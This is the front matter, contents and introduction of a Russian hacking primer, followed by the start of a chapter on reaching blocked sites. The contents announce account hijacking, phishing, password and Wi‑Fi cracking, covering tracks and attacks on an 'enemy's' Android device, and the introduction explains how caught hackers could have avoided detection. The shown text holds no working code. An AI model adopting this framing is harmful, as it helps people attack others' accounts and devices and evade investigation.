Ярошенко А.А.



# Xaker Akhr Xakhr

## НА ПРИМЕРАХ УЯЗВИМОСТИ, ВЗЛОМ, ЗАЩИТА

 Уязвимости сайтов, паролей, социальных сетей Анонимность
в интернете



Ярошенко А. А

## ХАКИНГ НА ПРИМЕРАХ

## УЯЗВИМОСТИ ВЗЛОМ ЗАЩИТА



2-е издание (исправ. и допол.)



@CODELIBRARY\_IT



"Издательство Наука и Техника"

Санкт-Петербург

УДК 004.42 ББК 32.973

Ярошенко А. А.

ХАКИНГ на примерах. Уязвимости, взлом, защита. 2-е издание (исправ. и допол.) — СПБ.: Издательство Наука и Техника, 2023. — 352 с., ил.

#### ISBN 978-5-94387-700-1

Из этой книги вы не узнаете, как взламывать банки – ничего противозаконного здесь описано не будет – мы не хотим, чтобы у наших читателей или кого-либо еще возникли какие-то проблемы из-за нашей книги.

Вы узнаете об основных принципах взлома сайтов (а чтобы теория не расходилась с практикой, будет рассмотрен реальный пример взлома); отдельная глава будет посвящена "угону" почтового ящика (мы покажем, как взламывается почтовый ящик – будут рассмотрены различные способы).

Также будет рассказано: как устроено анонимное общение в сети посредством электронной почты и всякого рода мессенджеров; как анонимно посещать сайты; как создать анонимный почтовый ящик и какой мессенджер позволяет зарегистрироваться без привязки к номеру телефона.

Будут рассмотрены самые популярные инструменты хакеров: KaliLinux, которая содержит несколько сотен (более 600) инструментов, ориентированных на различные задачи информационной безопасности; и инструмент для поиска уязвимостей и взлома информационных систем – Metasploit.

Отдельная глава посвящена взлому паролей. В основном мы будем взламывать пароль учетной записи Windows и рассмотрим, как можно взломать шифрование EFS и зашифрованный диск BitLocker. Также рассмотрим, как взламывается пароль Wi-Fi.

Для большинства задач не потребуется никаких специальных знаний, кроме базовых навыков работы с компьютером. А для тех, кто хочет освоить приемы "посерьезнее", потребуется знание основ программирования.

Издательство не несет ответственности за возможный ущерб, причиненный в ходе использования материалов данной книги, а также за доступность материалов, ссылки на которые вы можете найти в этой книге. На момент подготовки книги к изданию все ссылки на интернет-ресурсы были действующини Информация, содержащаяся в данной книге, получена из источников, рассматриваемых издательством как надежные Тем не менее, имея в виду возможные человеческие или технические ошибки, издательство не может гарантировать абсолютную точность и полноту приводимых сведений и не несет ответственности за возможные ошибки, издательство не может гарантировать абсолютную точность и полноту приводимых сведений и не несет ответственности за возможные ошибки, издательство не может гими



Контактные телефоны издательства:

(812) 412 70 26

Официальный сайт: www.nit.com.ru

- © Ярошенко А. А.
- © Издательство Наука и Техника (оригинал-макет)

Все права защищены Никакая часть данной книги не может быть воспроизведена в какой бы то ни было форме без письменного разрешения владельцев авторских прав

## Содержание

введение	9
В.1. ТИПИЧНЫЕ ОШИБКИ ХАКЕРОВ	9
Лень	9
Самоуверенность	
Глупость	11
В.2. ИСТОЧНИКИ ИНФОРМАЦИИ	11
В.3. КАК ЧИТАТЬ ЭТУ КНИГУ	13
ГЛАВА 1. ПОСЕЩАЕМ АНОНИМНО ЗАКРЫТЫЕ САЙ	ГЫ15
1.1. СПОСОБЫ ОБХОДА ЗАПРЕТА	15
1.2. СМЕНА СЕТИ	17
1.3. АНОНИМАЙЗЕР	19
1.4. АНОНИМНЫЕ ПРОКСИ-СЕРВЕРЫ	20
1.5. ТРИ ЗАВЕТНЫЕ БУКВЫ – VPN	25
1.5.1. Основная информация	
1.5.2. Обзор популярных VPN-провайдеров	
VPN Shield	
IPVanish VPN	
HideMyAss (HMA)	
Strong VPN	
Express VPN	
ГЛАВА 2. <b>КАК ВЗЛОМАТЬ САЙТ</b>	35
2.1. ЗАЧЕМ ВЗЛАМЫВАЮТ САЙТ	35
2.2. КАК ВЗЛАМЫВАЮТ САЙТЫ	36
2.3. РЕАЛЬНЫЙ ПРИМЕР: ВЗЛАМЫВАЕМ ГОЛОСОВАЛКУ	
2.3.1. Выбираем оптимальный способ	
2.3.2. Накрутка с помощью анонимайзеров	40
2.3.3. Анонимные прокси	
Как защититься?	
2.3.4. Ломаем голосовалку	
2.3.5. Автоматизируем 2.3.6. Как защититься от взлома?	
ГЛАВА 3. <b>КАК ВЗЛОМАТЬ ЭЛЕКТРОННУЮ ПОЧТУ</b>	35
3.1. ТРОЯНСКИЙ КОНЬ	53
3.2. ВЗЛОМ ПО НОМЕРУ ТЕЛЕФОНА	57
3.3. ФИЗИЧЕСКИЙ ДОСТУП К КОМПЬЮТЕРУ	58
,	

3.4. СОЦИАЛЬНАЯ И	НЖЕНЕРИЯ ИЛИ ПРОСТО ОБМАН	61
3.5. МОДНОЕ СЛОВО	"ФИШИНГ"	62
3.6. ВОССТАНАВЛИВ	АЕМ ПАРОЛЬ	65
3.7. КРАЖА COOKIES		66
3.8 Х55-УЯЗВИМОСТ	'И	67
3.9. МЕТОЛ ГРУБОЙ (	СИЛЫ	
і ЛАВА 4. <b>как () і</b> Электро	ПРАВЛЯТЬ ЭЛЕКТРОННУЮ ПОЧТУ И ДРУ	і ие 40
JIEKIP	Эппые сообщения апонимно	09
4.1. ЗАПОВЕДИ ПАРА	НОИКА	69
4.2. ЦЕЛИ АНОНИМН	ЮСТИ ПОЧТОВОГО ЯЩИКА	70
4.3. ПОЛУЧАЕМ АНО	НИМНУЮ ПОЧТУ	73
4.4 КАКОЙ МЕССЕН	ЛЖЕР САМЫЙ АНОНИМНЫЙ	70
4.4. KARON MECCEN		ر،
4.4.1.	Viber	80 80
4.4.2.	WhatsAnn	80
4.4.4	Signal	82
4.4.5.	Briar	82
4.4.6.	 Мессенджеры социальных сетей	83
4.4.7.	WickrMe	84
4.4.8.	Wire	86
ГЛАВА 5. АНОНИ	ІМНОСТЬ В ИНТЕРНЕТЕ. ВОЗМОЖНО ЛИ?	87
5 1 UACTUUUAGAU	OUMMUOCTL	97
5.1. ЧАСТИЧНАЛ АН	Онимпоств	
5.2. ЦЕПОЧКИ ПРОК	СИ	89
5.3. ПРОЕКТ ТО <b>R</b>		91
5.3.1.	Что такое Тог	91
5.3.2.	Как работает браузер Тог	92
5.3.3.	Кто и зачем использует Тог?	94
5.3.4.	Что лучше: VPN или Tor?	95
5.3.5.	Tor u VPN	97
	Tor yepes VPN	97
	VPN vepes Tor	98
5.3.6.	Использование браузера Tor в Windows	99
5.3.7.	Тонкая настройка Тог	102
	Установка выходных узлов	102
	Фиксирование входных узлов	103
	Исключение подозрительных узлов	103
	Запрещаем использовать комп в качестве выходного узла	104
	Установка прокси-сервера в Tor	104
	Другие параметры конфигурационного файла	105
5.3.8.	Установка Tor в Android	109

5.4. VPN ДЛЯ I	LINUX	
5.5. ЧТО ТАКС	DE DARKNET?	113
5.6. НА ПУТИ	к полной анонимности	114
ГЛАВА 6. ч	ЧТО ТАКОЕ <i>КАLI LINUX</i> И КАК ЕГО	
использ	ЗОВАТЬ ДЛЯ ВЗЛОМА	117
61 DEDATILE	O KALI	117
U.I. BRIAILE	0 KALI	
6.2. ГДЕ СКАЧ	АТЬ И КАК УСТАНОВИТЬ <i>КАLI LINUX</i>	121
6.3. ОБСЛУЖІ	ИВАНИЕ СИСТЕМЫ	132
	6.3.1. Обслуживание источников пакетов	
	6.3.2. Ошибка "The disk contains an unclean file system (0, 0). Ме	tadata kent
	in Windows cache, refused to mount"	
	6.3.3. Регулярная очистка системы	
	6.3.4. Задание пароля <i>root</i> . Вход как <i>root</i>	135
6.4. ОБЗОР ЛУ	/ЧШИХ ИНСТРУМЕНТОВ <i>КALI LINUX</i>	137
	6.4.1. WPScan	
	6.4.2. Nman	139
	6.4.3. Lynis	
	6.4.4. Aircrack-ng	
	6.4.5. Hvdra	
	6.4.6. Wireshark	
	6.4.7. Metasploit Framework	
	6.4.8. Skipfish	
	6.4.9. Solmap	
	6.4.10. Взлом пароля Windows. John the Ripper	
	6.4.11. Wireshark – захват трафика	
	6.4.12. Autopsy Forensic Browser: профессиональный инструмен	HT
	правоохранительных органов	
	6.4.13. Nikto	
	6.4.14. Snort	
	6.4.15. Airflood	
	6.4.16. Apktool	
	6.4.17. Nessus – лучший сканер уязвимостей	
	6.4.18. fcrackzip – взлом пароля Zip-архива	178
ГЛАВА 7.	СЕКРЕТЫ МЕТАЅРЬОІТ	
7.1. ЧТО ТАКС	DE METASPLOIT	181
7.2. СТРУКТУ	РА ФРЕЙМВОРКА	
7.3. БАЗОВАЯ	ТЕРМИНОЛОГИЯ	184
7.4. КОНФИГ	УРАЦИИ ФРЕЙМВОРКА И ОСНОВНЫЕ КОМАНДЫ	
7.5. КОНФИГ	УРАЦИЯ МОДУЛЕЙ	
,		

7.6. ПЕРВЫЙ ЗАПУСК METASPLOIT188
7.7. ПРАКТИЧЕСКОЕ ИСПОЛЬЗОВАНИЕ КОМАНД METASPLOIT192
7.7.1. Команда <i>help</i> – получение справки
7.7.2. Команда иse – выбор модуля для использования
7.7.3. Команда <i>show</i> – показ сущностей 194
7.7.4. Команды set и setg – установка значений переменных 199
7.7.5. Команда <i>сheck</i> – проверка целевой системы
7.7.6. Команда <i>back</i> – возврат
7.7.7. Команда <i>гип</i> – запуск эксплойта 201
7.7.8. Команда <i>resource</i> – определение ресурса
7.7.9. Команда <i>irb</i> 202
7.8. ПРАКТИЧЕСКИЙ ПРИМЕР 1: ВЗЛАМЫВАЕМ СТАРЕНЬКИЙ СЕРВЕР WINDOWS 2008 С ПОМОЩЬЮ ЭКСПЛОЙТА АНБ
7.9. ПРАКТИЧЕСКИЙ ПРИМЕР 2: ХАКАЕМ СОВРЕМЕННЫЕ СИСТЕМЫ – WINDOWS SERVER 2016 И WINDOWS 10206
ГЛАВА 8. <b>ВЗЛОМ И ЗАЩИТА АККАУНТОВ В СОЦИАЛЬНЫХ СЕТЯХ211</b>
8.1. КТО И ЗАЧЕМ ВЗЛАМЫВАЕТ АККАУНТЫ211
8.2. СБОР ИНФОРМАЦИИ
8.3. МЕТОДЫ ВЗЛОМА217
8.3.1. Взлом электронной почты 217
8.3.2. Социальный инжиниринг 218
8.3.3. Перебор пароля 218
8.3.4. Фишинг, или фейковая страничка. Очень подробное руководство 221
8.3.5. Клавиатурный шпион 233
8.3.6. Подмена DNS 234
8.4. КАК УБЕРЕЧЬСЯ ОТ ВЗЛОМА
ГЛАВА 9. <b>ВЗЛОМ ПАРОЛЕЙ И ПОЛУЧЕНИЕ ДОСТУПА К</b>
ЗАШИФРОВАННЫМ ДАННЫМ237
9.1. СБРОС ПАРОЛЯ WINDOWS 10
9.1.1. Сброс пароля с помощью PowerShell
9.1.2. Взлом пароля с помощью утилиты Lazesoft Recover My Password238
9.1.3. Сброс пароля Windows 10 через режим восстановления
9.2. ПОЛУЧЕНИЕ ДОСТУПА К ФАЙЛАМ, ЗАШИФРОВАННЫМ С ПОМОЩЬЮ EFS242
9.2.1. Что такое EFS? 242
9.2.2. Включение EFS-шифрование
9.2.3. Использование программы Advanced EFS Data Recovery для
расшифровки зашифрованных EFS файлов 245
9.3. ВОССТАНОВЛЕНИЕ ДОСТУПА К ВІТLOCKER
9.3.1. Особенности реализации

	9.3.2. Технические подробности	253
	9.3.3. Включение шифрования и восстановления доступа с пом	ющью
	ключа восстановления	254
	9.3.4. Дополнительные возможности взлома BitLocker	260
9.4. ВЗЛОМ ПА	РОЛЯ <i>ROOT</i> B LINUX	263
9.5. УТИЛИТА	CRUNCH: ГЕНЕРАТОР ПАРОЛЕЙ	269
ГЛАВА 10. I	ВЗЛАМЫВАЕМ СОСЕДСКИЙ WI-FI-POУ1	Г <b>ЕР273</b>
10.1. ПРИЧИНЬ	J ВЗЛОМА	273
10.2. УЗНАЕМ (	СВОЙ ПАРОЛЬ WI-FI	275
10.3. МЕНЯЕМ	МАС-АДРЕС	276
10.4. ВЗЛОМ РС	УТЕРА С ИСПОЛЬЗОВАНИЕМ УЯЗВИМОСТИ	278
		270
	10.4.1. установка и запуск инструмента	
	10.4.2. Проверка на уззвимость по всем эксплоитам	
	10.4.4. Использование эксплойтов	280
10.5. ВЗЛОМ W	РА2-РОУТЕРА. МИФЫ И РЕАЛЬНОСТЬ	283
10.6. ABTOMAT	`ИЗИРУЕМ ВЗЛОМ С ПОМОЩЬЮ WIFITE	293
10.7. ANDROID	-ПРИЛОЖЕНИЕ ДЛЯ БРУТФОРСИНГА WI-FI-СЕТИ	
10.8. КАК РАЗД	ОБЫТЬ ХОРОШИЙ ХАКЕРСКИЙ СЛОВАРЬ	301
	10.8.1. Словари BruteX	301
	10.8.2. Словарь госкуои	302
	10.8.3. Словари DIRB	303
	10.8.4. Словари DirBuster	303
	10.8.5. Списки слов от Metasploit	304
	10.8.6. Словари Ncrack	304
	10.8.7. Списки слов Nmap	304
	10.8.8. Словари Wfuzz	
	10.8.9. Словари дефолтных учетных записей для роутеров	
	10.8.10. Штатные словари различных программ	
10.9. ИТОГИ И	РЕАЛИИ	306
ГЛАВА 11.	ЗАМЕТАЕМ СЛЕДЫ	
11.1. ОЧИСТКА	СПИСКОВ НЕДАВНИХ МЕСТ И ПРОГРАММ	
11.2. ОЧИСТКА	а СПИСКА USB-НАКОПИТЕЛЕЙ	312
11.3. ОЧИСТКА	А КЭША И ИСТОРИИ БРАУЗЕРОВ	315
11.4. УДАЛЯЕМ	I ЗАПИСИ DNS	
11.5. ОЧИСТКА	FLASH COOKIES	
11.6. УДАЛЕНИ	Е СПИСКА ПОСЛЕДНИХ ДОКУМЕНТОВ MS OFFICE	316
, 		7

11.7. АВТОМАТИЗИРУЕМ ОЧИСТКУ С ПОМОЩЬЮ CCLEANER
11.8. РЕАЛЬНОЕ УДАЛЕНИЕ ФАЙЛОВ
11.9. СОЗДАЕМ ВАТ-ФАЙЛ ДЛЯ ОЧИСТКИ ВСЕГО
11.10. СОЗДАЕМ АИТОНОТКЕҮ-СКРИПТ ДЛЯ ОЧИСТКИ ВСЕГО
ГЛАВА 12. ПОЛНОЕ УДАЛЕНИЕ ДАННЫХ
12.1. СТИРАЕМ ИНФУ С ЖЕСТКОГО ДИСКА
12.2. ПРИЛОЖЕНИЯ ДЛЯ БЕЗОПАСНОГО УДАЛЕНИЯ ДАННЫХ С ЖЕСТКИХ ДИСКОВ325
12.3. УДАЛЕНИЕ ИНФОРМАЦИИ С SSD
ГЛАВА 13. ШВЕЙЦАРСКИЙ НОЖ ХАКЕРА
13.1. КАК ВОССТАНОВИТЬ ПАРОЛЬ ТОТАL COMMANDER
13.2. БЕСПЛАТНАЯ ОТПРАВКА SMS ПО ВСЕМУ МИРУ
13.3. ЗАПУТЫВАЕМ СЛЕДЫ В ЛОГАХ СЕРВЕРА
13.4. ВОРУЕМ WINRAR
13.5. ПРИВАТНАЯ ОПЕРАЦИОННАЯ СИСТЕМА КОДАСНІ
13.6. ПЛАГИН PRIVACY POSSUM ДЛЯ FIREFOX
13.7. ПОЛУЧАЕМ КОНФИДЕНЦИАЛЬНУЮ ИНФОРМАЦИЮ О ПОЛЬЗОВАТЕЛЕ FACEBOOK .336
13.8. УЗНАЕМ МЕСТОНАХОЖДЕНИЕ ПОЛЬЗОВАТЕЛЯ GMAIL
13.9. ОБХОД АВТОРИЗАЦИИ WI-FI С ГОСТЕВЫМ ДОСТУПОМ. ЛОМАЕМ ПЛАТНЫЙ WI-FI В ОТЕЛЕ337
13.10. САЙТ ДЛЯ ИЗМЕНЕНИЯ ГОЛОСА
13.11. СПАМИМ ДРУГА В TELEGRAM С ПОМОЩЬЮ TERMUX
13.12. УЗНАЕМ IP-АДРЕС ЧЕРЕЗ TELEGRAM
13.13. КАК УБИТЬ ANDROID-ДЕВАЙС ВРАГА
13.14. ШИФРУЕМ ВИРУС ДЛЯ ANDROID
13.15. МСТИМ НЕДРУГУ С ПОМОЩЬЮ CALLSPAM
13.16. ЕЩЕ ОДНА БОМБА-СПАММЕР ТВОМВ
13.17. ВЗЛОМ INSTAGRAM345
13.18. DDOS-АТАКА РОУТЕРА
13.19. SPLOITUS – ПОИСКОВИК СВЕЖИХ УЯЗВИМОСТЕЙ
13.20. УГОН TELEGRAM-АККАУНТА
13.21. КАК ПОЛОЖИТЬ WI-FI СОСЕДА ИЛИ КОНКУРЕНТА
Вместо заключения
Список использованных источников информации
8

## Введение

Данная книга позволит почувствовать себя настоящим хакером даже самому начинающему пользователю. Никаких специальных знаний, кроме базовых навыков работы с компьютером (как пользоваться Интернетом, как устанавливать программы, и, разумеется, как включить и выключить компьютер!) тебе не нужно. Все остальное ты узнаешь, прочитав эту книгу.

Из этой книги ты не узнаешь, как взламывать банки, – ничего противозаконного описано здесь не будет. Мы не хотим, чтобы у наших читателей возникли какие-то проблемы из-за нашей книги. Однако в ней приведены сведения, о которых рядовые пользователи даже не подозревают.

Прежде чем приступить к чтению этой книги, поговорим о типичных ошибках хакеров и о том, как их вычисляют. Лучше знать эту информацию заранее!

## В.1. Типичные ошибки хакеров

В реальности вычисление хакеров происходит совсем не так, как нам это показывают в фильмах. Нет каких-то супертехнологий, позволяющих моментально выполнить деанонимизацию злоумышленника, нет *backdoor* во всех программах, и спецслужбы не могут расшифровать абсолютно любой трафик, получить доступ к любому почтовому ящику и т.д.

На самом деле губят хакеров не какие-то супертехнологии и не всесильные киберспецагенты. Все гораздо проще: излишняя самоуверенность, лень и глупость. Вот три характерных фактора, благодаря которым раскрываются большинство преступлений в киберпространстве.

В подтверждение этого приведем несколько реальных примеров.

## Лень

Томаш Скоурон воровал деньги со счетов посредством вредоносного софта. Схема стара как мир: троян похищал доступ к интернет-банкингу, злоумышленник получал доступ к счетам жертвы и переводил деньги на подставных лиц, а потом обналичивал. Примечательно, что ему удалось вывести более 1 миллиона долларов, а жертвами хакера стали пользователи по всему миру.

Чтобы хакера не вычислили, он использовал VPN для смены своего IP. Но однажды либо он забыл его включить, либо VPN дал сбой и в логах интернет-банкинга появился реальный IP злоумышленника. В результате Томашу была презентована путевка в места не столь отдаленные сроком на 5 лет.

Что это было? Сбой VPN, забывчивость Томаша или лень (проверить свой IP перед обращением к банкингу)?

Бывает так, что VPN-соединение может незаметно для самого пользователя "отвалиться". Например, был сбой основного соединения, а после его восстановления VPN еще не успел отправить данные через VPN-сервер и часть данных ушла в обход VPN.

Скорее всего, Томаша сгубила обычная лень или же самоуверенность в своих действиях – а как же, один раз все прошло хорошо, в следующий тоже так будет. Будь он более осторожен, такого бы не случилось.

#### Самоуверенность

Нашумевшее дело Джереми Хаммонда. В 2013 году он получил 10 лет тюрьмы за вмешательство в работу разведывательного areнтства Stratfor, которое в США считается "вторым ЦРУ".

Дел он натворил немало – стер файлы с серверов Stratfor, передал скопированную информацию в Wikileaks, а с банковских счетов клиентов Stratfor было сделано более 700 тысяч долларов всевозможных пожертвований. Прямо Робин Гуд.

Как же его нашли? ФБР провела довольно кропотливую работу по вербовке одного из членов хакерской группировки. Как именно это произошло, никто не знает. Скорее всего, поймали самого глупого и пообещали либо свободу, либо денежное вознаграждение.

А где же самоуверенность? Конечно же, он все шифровал – как настоящий профи. Но вот пароль к его жесткому диску был "Chewy 123" – это имя его кошки и "123". Агенты ФБР, когда выяснили, кто он, и собрали на него полное досье, без особых проблем подобрали такой пароль.

Данная ситуация – пример самоуверенности. Ну не думал он, что его вычислят, а даже если и вычислят, то был уверен, что "столь сложный" пароль никто не подберет.

#### Глупость

В 2013 году Павел Врублевский организовал DDoS-атаку на серверы компании-конкурента "Ассист". В результате сайты клиентов "Ассиста", в том числе сайт "Аэрофлота", не могли нормально функционировать.

Как ФСБ смогло вычислить хакера и доказать его вину? Только вдумайтесь: Врублевский вместе со своими "подельниками" использовал мессенджер ICQ. Во-первых, данный мессенджер принадлежит Mail.Ru Group, чье тесное сотрудничество с ФСБ – не секрет. Во-вторых, сервис ICQ сам по себе небезопасен, даже если бы он и не принадлежал Mail.Ru. Нужно было выбирать более безопасный мессенджер или же хотя бы использовать шифрование. Хотя шифрование шифрованию рознь. Можно шифровать ГОСТовским алгоритмом, например, через тот же Крипто-ПРО. Вопрос лишь в том, как быстро расшифруют.

Очевидно, деанонимизация произошла по глупости группы. Если бы они были более осведомлены в вопросах шифрования сообщений в мессенджерах, доказать их вину было бы гораздо сложнее.

## В.2. Источники информации

Данная книга, безусловно, послужит хорошим фундаментом для твоего будущего призвания или хобби – как хочешь это, так и называй. Но она не может вместить все необходимые знания, тем более мир IT постоянно меняется и эти знания нужно постоянно актуализировать.

Существует много веб-ресурсов, в первую очередь форумов по тематике информационной безопасности и хакерства. Безусловно, на них может иметься полезный материал, но хочу порекомендовать некоторые меры предосторожности:

 Не стоит запускать исполнимые файлы (.exe-программы), скачанные с "хакерских" сайтов, поскольку большинство из них (или их крэки) содержат трояны, вирусы – для этого они и распространяются. Лучше всего для этого развернуть виртуальную машину – можно использовать VMWare или бесплатный VirtualBox и работать с такими программами в виртуальной машине. Даже если программа и испортит операционную систему, то только операционную систему виртуальной машины. С твоей основной операционкой ничего не случится.

- Даже со скачанными скриптами следует быть осторожными лучше не запускать их, если ты не понимаешь, что делает их код; самый лучший вариант – скачать с доверенных ресурсов или опять-таки запускать их в виртуальной ОС.
- Не попадайтесь на уловки мошенников продажу курсов, "работы", услуг – зачастую на подобных ресурсах это является банальным обманом.

Из интересных ресурсов, содержащих большой архив информации, а также регулярно пополняющиеся новым авторским материалом, можно отметить:

- https://forum.antichat.ru
- https://xakep.ru

На первом, кроме чтения инструкций от самих пользователей, можно задать вопрос и часто получить на него квалифицированный ответ. Там бывают даже авторы некоторых инструментов, например, таких как Router Scan by Stas'M и легендарного Intercepter-NG.

Журнал "Хакер" содержит впечатляющий постоянно пополняющийся архив статей. В настоящее время публикуются преимущественно новости сферы информационной безопасности, но выходят и более практические материалы.

Два молодых ресурса, нацеленных главным образом на практику, в настоящее время активно пополняются актуальным материалом:

- https://kali.tools
- https://hackware.ru

Первый создавался как перевод оригинального Kali Tools (*http://tools.kali.* org/tools-listing), но было решено сделать более глубокий, опять же, более практический материал, поэтому "клон" Kali.Tools давно развивается своим собственным путем. Он содержит описание и перевод справки для инструментов, не только отсутствующих в оригинальном листинге, но даже пока в самой Kali Linux.

Второй задумывался как сателлит kali.tools, на котором размещаются инструкции по использованию хакерских программ.

## В.З. Как читать эту книгу

В первой главе мы поговорим о том, как анонимно посещать сайты. Речь не пойдет о полной анонимности в Интернете. Сначала мы поставим маленькую задачу – сделать так, чтобы ни администратор сети, ни провайдер не смог узнать, какой сайт ты посещаешь, а администратор сайта не знал, кто ты. Подробнее об обеспечении анонимности мы поговорим в главе 5, там же ты узнаешь, что такое Tor и даркнет, где можно купить всякого рода незаконные штуки. Необходимые знания для глав 1 и 5: базовые навыки владения компьютером и умение устанавливать программы в Windows.

Во второй главе мы рассмотрим основные принципы взлома сайтов. Также, чтобы теория не расходилась с практикой, будет рассмотрен реальный пример взлома. Необходимые навыки: понимание HTML-разметки и основ языка программирования PHP. Для повторения примера – только внимательность.

Глава 3 посвящена угону почтового ящика. Мы покажем, как взломать почтовый ящик – будут рассмотрены различные способы, тебе лишь нужно выбрать, какой для тебя наиболее предпочтителен. Необходимые навыки зависят от выбранного способа.

Анонимное общение в сети посредством электронной почты и всякого рода мессенджеров будет рассмотрено в главе 4. Ты узнаешь, как создать анонимный почтовый ящик и какой мессенджер позволяет зарегистрироваться без привязки к номеру телефона. Необходимые навыки: особых не требуется, просто владение компьютером на уровне пользователя и умение устанавливать программы в Windows.

Существует много инструментов, которые хакеры используют каждый день. Несколько сотен таких инструментов содержит в себе дистрибутив Kali Linux. В главе 6 мы покажем, как установить Kali Linux в виртуальную машину и как использовать некоторые из его инструментов. Также в этой главе будет рассмотрен инструмент для судебного эксперта – мы покажем, как найти улики на компьютере. Тебе он пригодится, чтобы ты знал, что и как чистить. Ну или на случай, если ты решишь переквалифицироваться и перейти на белую сторону. Необходимые знания: умения устанавливать программы в Windows и базовые навыки работы с Linux. Если таковых нет – не беда, но в будущем обязательно обзаведись ними, прочитав одну из книг, в которой рассматривается работа в OC Linux.

Глава 7 является продолжением главы 6. В ней будет рассмотрен инструмент для поиска уязвимостей и взлома информационных систем – Metasploit,

входящий в состав Kali Linux. Для начала никаких специальных знаний не нужно – просто повторяй примеры из этой книги или найденные в Интернете, но для более продуктивной работы с Metasploit нужно более глубокое понимание вещей – как устроена сеть, как передаются пакеты по сети, как работает сетевой уровень и т.д.

Глава 9 посвящена взлому паролей. В основном мы будем взламывать пароль учетной записи Windows и рассмотрим, как можно взломать шифрование EFS и зашифрованный диск BitLocker. Для работы с этой главой особых навыков не требуется, но ты должен уверенно владеть Windows, поскольку самые элементарные вещи в книге не объясняются. Книга таки для хакеров, пусть и начинающих, а не "для чайников".

Очень интересной получилась глава 10, в которой будет показано, как взломать пароль Wi-Fi. Помимо всего прочего, в этой главе ты найдешь ссылки на списки паролей, которые можно использовать не только для взлома Wi-Fi, но и для взлома других систем/сервисов. Особые навыки: очень желательно владеть Linux.

Главы 11 и 12 — из них ты узнаешь, как зачистить следы и полностью удалить с носителя информацию без его сожжения в топке. Никаких специальных знаний не требуется, просто навыки использования Windows на уровне пользователя.

Последняя, **13-я глава**, это своеобразный швейцарский нож, в котором рассмотрены рецепты на каждый день. Никогда не знаешь, когда тебе они понадобятся, но они понадобятся каждому.

Как видишь, в большинстве случаев для работы с книгой никаких специальных навыков не требуется. Введение немного затянулось, поэтому самое время приступить к чтению!

## Глава 1.

## Посещаем анонимно закрытые сайты

Первая практическая задача, которая будет рассмотрена в этой книге, – посещение закрытых сайтов. Власти разных стран по тем или иным соображениям закрывают доступ к неугодным ресурсам. Раньше закрывали доступ преимущественно к Torrent-трекерам, мотивируя все это борьбой с пиратством. Это еще можно понять. Но потом в моду вошла блокировка социальных сетей. Здесь уже решения сугубо политические. А давайте, например, запретим Одноклассники и ВК! Взяли и запретили! В Китае заблокированы Facebook, Twitter, Youtube и многие другие популярные ресурсы. Аналогичный запрет существует в Иране. В России запрещена и так не очень популярная LinkedIn. Зачем было вводить сей запрет – непонятно. Также данная глава поможет тебе обойти запрет, установленный администратором на работе. В некоторых компаниях также могут блокировать доступ к тем или иным ресурсам.

## 1.1. Способы обхода запрета

Чтобы правильно обойти установленный запрет, нужно понимать, что и как делать. Многостраничной теории в этой книге не будет, но минимально необходимые знания будут предоставлены.

Существует несколько способов обхода запрета на доступ к ресурсу, все они представлены в таблице 1.

Способ	Описание	
Смена сети	Самый простой способ, и он подойдет, если запрет досту- па осуществляется не на уровне всей страны, а на местном уровне, например, администратор запретил доступ к нуж- ным ресурсам из корпоративной сети или же твой про- вайдер запретил доступ к сайту своего конкурента, дабы тот не переманивал клиентов. Достаточно подключиться к другой сети, например, к сети сотового оператора, и дан- ный запрет будет преодолен. Далее мы рассмотрим этот способ подробнее	
VPN	Благодаря властям некоторых стран даже самая начинаю- щая домохозяйка знает, что такое VPN. Ведь виртуальная частная сеть позволяет обойти блокировку любимой со- циальной сети!	
Анонимайзер	Некогда популярные сайты-анонимайзеры сейчас угаса- ют, тем не менее они предоставляют возможность открыть какой-то заблокированный сайт, если это нужно	
Анонимные прокси- серверы	В сети существуют списки анонимных прокси. Подклю- чившись к одному из них, вы сможете сменить свой IP- адрес и обойти запрет на доступ к нужному ресурсу	
Tor	Заслуживает отдельного разговора и будет рассмотрен в главе 5	

Все эти способы, грубо говоря, сводятся к одному – к использованию узлапосредника. Представим, что есть два узла А и Б. А – это твой компьютер, Б – это заблокированный сайт. Провайдер "видит", что узел А пытается получить доступ к заблокированному узлу, и либо блокирует доступ, либо перенаправляет пользователя на страничку, на которой указано, что он пытается получить доступ к заблокированному ресурсу, что, в принципе, одно и то же.

Теперь представим, что у нас появился узел П. Это узел посредник. Твой компьютер обращается не к заблокированному узлу Б, а к узлу П. В свою очередь, узел П передает твой запрос целевому узлу Б, получает ответ и

передает **узлу А**. С точки зрения провайдера это выглядит как обмен данными с **узлом П**, поэтому соединение не блокируется.

Конечно, тут могут возникнуть две неприятные ситуации:

- 1. Узел П также заблокирован провайдером. В этом случае нужно использовать другого посредника. Например, другой способ обхода запрета или же другой прокси-сервер в списке (об этом позже).
- 2. Современные технологии не стоят на месте, и провайдеры могут не только анализировать заголовки отправляемых данных, но и их содержимое. Другими словами, провайдер по передаваемым данным может понять, что пользователь пытается получить доступ к заблокированному ресурсу, и прервет соединение. Чтобы этого не произошло, нужно использовать шифрование. Обычные сайты-анонимайзеры, как правило, работают по протоколу HTTP, что не подразумевает шифрования. Их вы использовать не сможете. Остальные способы будут работать. Исключения составляют некоторые прокси, не поддерживающие HTTPS, но таких все меньше и меньше.

Далее мы подробно рассмотрим каждый способ, и ты сможешь выбрать наиболее подходящий для себя.

## 1.2. Смена сети

Злой администратор корпоративной сети заблокировал доступ к любимому сайту. И так на работе скучно, а теперь стало еще скучнее. Благо мобильный Интернет подешевел, а его скорость выросла, и современного стандарта 4G/5G вполне достаточно для быстрого открытия всех сайтов.

Даже если админ заблокировал сайт в рабочей сети, просто выключи Wi-Fi на своем телефоне и подключить к нему через сеть сотового оператора. Преимущества:

- Не нужно устанавливать какие-либо программы и изменять конфигурацию существующих.
- Твой админ никогда не догадается, какие сайты ты посещал в рабочее время – ведь соединения не будут проходить через корпоративную сеть. Но твой сотовый оператор будет все видеть – об этом не нужно забывать!

При желании можно расшарить интернет-соединение и подключить свой рабочий компьютер к сети смартфона. В этом случае ты сможешь просматривать любимый сайт с компа. Но нужно помнить о следующем:

- Поскольку твой комп вышел из корпоративной сети, ты больше не сможешь использовать ее ресурсы, то есть подключаться к сетевым дискам, программам, печатать на корпоративных сетевых принтерах. Если нужно кратковременно зайти на какой-то заблокированный сайт (который плохо отображается на экране смартфона), этот вариант рабочий. Для длительного использования он не подойдет, поскольку ты не сможешь выполнять возложенные на тебя служебные обязанности, следовательно, начнутся проблемы. Оно тебе надо?
